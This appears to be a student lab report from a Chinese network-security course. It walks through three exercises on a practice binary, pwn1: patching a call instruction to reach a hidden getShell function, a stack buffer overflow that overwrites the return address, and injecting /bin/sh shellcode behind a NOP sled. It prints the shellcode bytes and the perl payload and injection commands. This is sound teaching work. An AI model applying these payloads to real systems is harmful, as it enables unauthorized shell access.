20155308《网络攻防》 Exp1 PC平台逆向破解(5)M

逆向及Bof基础实践说明

1.1 实践目标

  1. 本次实践的对象是一个名为pwn1的linux可执行文件。
  2. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
  3. 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
  • 三个实践内容
  1. 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  2. 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  3. 注入一个自己制作的shellcode并运行这段shellcode。
  • 思路
  1. 运行原本不可访问的代码片段
  2. 强行修改程序执行流
  3. 以及注入运行任意代码。

1.2 基础知识

  • Linux基本操作

    参考网页

https://www.cnblogs.com/crazylqy/p/5818745.html

http://blog.csdn.net/zl_best/article/details/53504712

  • Bof的原理

缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。

攻击原理:

通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。例如下面程序:

void function(char *str) {
char buffer[16];
strcpy(buffer,str);
}

上面的strcpy()将直接把str中的内容copy到buffer中。这样只要str的长度大于16,就会造成buffer的溢出,使程序运行出错。存在象strcpy这样的问题的标准函数还有strcat(),sprintf(),vsprintf(),gets(),scanf()等。

当然,随便往缓冲区中填东西造成它溢出一般只会出现“分段错误”(Segmentation fault),而不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell,再通过shell执行其它命令。如果该程序有root或者suid执行权限的话,攻击者就获得了一个有root权限的shell,可以对系统进行任意操作了。

  • 会使用gdb,vi

参考网页

http://blog.csdn.net/luoying198791/article/details/20715499

实践一:直接修改程序机器指令,改变程序执行流程

  • 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
  • 学习目标:理解可执行文件与机器指令
  • 进阶:掌握ELF文件格式,掌握动态技术

实验过程:

  1. 首先进行文件的拷贝,防止出现操作错误,使得源文件被改变。

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

2. 通过objdump -d pwn1_20155308命令对文件进行反汇编。

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

  1. 关注这几个部分

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

4. 通过命令vi pwn1_20155308编辑文件,通过命令:%! xxd把文件转为十六进制编辑模式

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

5. 通过命令/d7ff查找要修改的内容

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

main函数调用foo,对应机器指令为“e8 d7ffffff”,

那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。

用Windows计算器,直接 47d-4ba就能得到补码,是c3ffffff。

6. 输入i进入编辑模式,即把d7为c3

7. 输入命令:%! xxd -r将文件转回至二进制形式

8. 输入:wq保存并退出

9. 通过objdump -d pwn1_20155308命令对文件进行反汇编,观察到程序已从原来跳转至foo函数变为跳转至getshell函数

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

实验结果:

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

实践二;通过构造输入参数,造成BOF攻击,改变程序执行流

  • 知识要求:堆栈结构,返回地址 学习目标:理解攻击缓冲区的结果,掌握返回地址的获取 进阶:掌握ELF文件格式,掌握动态技术

反汇编,了解程序的基本功能

objdump -d pwn1 | more

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

注意这个函数getShell,我们的目标是触发这个函数

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

这里读入字符串,但系统只预留了__字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址

上面的call调用foo,同时在堆栈上压上返回地址值:++80484ba++

现在我们需要确认输入的字符串哪几个字符会覆盖到返回地址

输入命令gdb pwn2_20155308进行调试

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

通过命令r进行运行,通过命令info r可查看各寄存器的值

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

如果输入字符串1111111122222222333333334444444412345678,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。

确认用什么值来覆盖返回地址

getShell的内存地址,通过反汇编时可以看到,即0804847d。

接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

对比之前 eip 0x343332310x34333231 ,正确应用输入 11111111222222223333333344444444\x7d\x84\x04\x08。

构造输入字符串

由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

实践三:注入Shellcode并执行

  • shellcode就是一段机器指令(code)

    通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),

    所以这段机器指令被称为shellcode。

    在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。

    --

最基本的shellcode的编写可参考许同学的文章Shellcode入门,写得非常之清楚详实。以下实践即使用该文章中生成的shellcode。如下:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

准备工作

◦输入命令execstack -s pwn1

设置堆栈可执行。但是系统提示“未找到命令”,则应输入命令apt-get install execstack进行安装。系统会提示产生一下错误,我上网寻找了答案,应该输入以下命令给它管理员权限。

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

之后根据命令输入。

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

构造要注入的payload

  • Linux下有两种基本构造攻击buf的方法:
  1. retaddr+nop+shellcode
  2. nop+shellcode+retaddr。

-因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。

简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边

-我们这个buf够放这个shellcode了。

结构为:nops+shellcode+retaddr。

nop一为是了填充,二是作为“着陆区/滑行区”。

我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。

root@KaliYL:~# perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

接下来我们来确定\x4\x3\x2\x1到底该填什么。

打开一个终端注入这段攻击buf:

(cat input_shellcode;cat) | ./pwn1_20155308

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

再开另外一个终端,用gdb来调试pwn1这个进程。

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

注意运行时的这个地址

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

计算出地址应为0xffffd300

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

再次攻击,成功了!!

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M-LMLPHP

感想

本次实验是关于PC平台逆向破解的实验,在课堂上老师已经对本次实验进行了讲解,并且我们在课堂上已经实现了一部分,所以感觉课下的工作并不是很难。

通过本次实验,我对于本课的知识有了一定的了解,并且觉得如果想要学好这门课,一定要做好课上认真听讲,课下进行实践。

05-11 17:56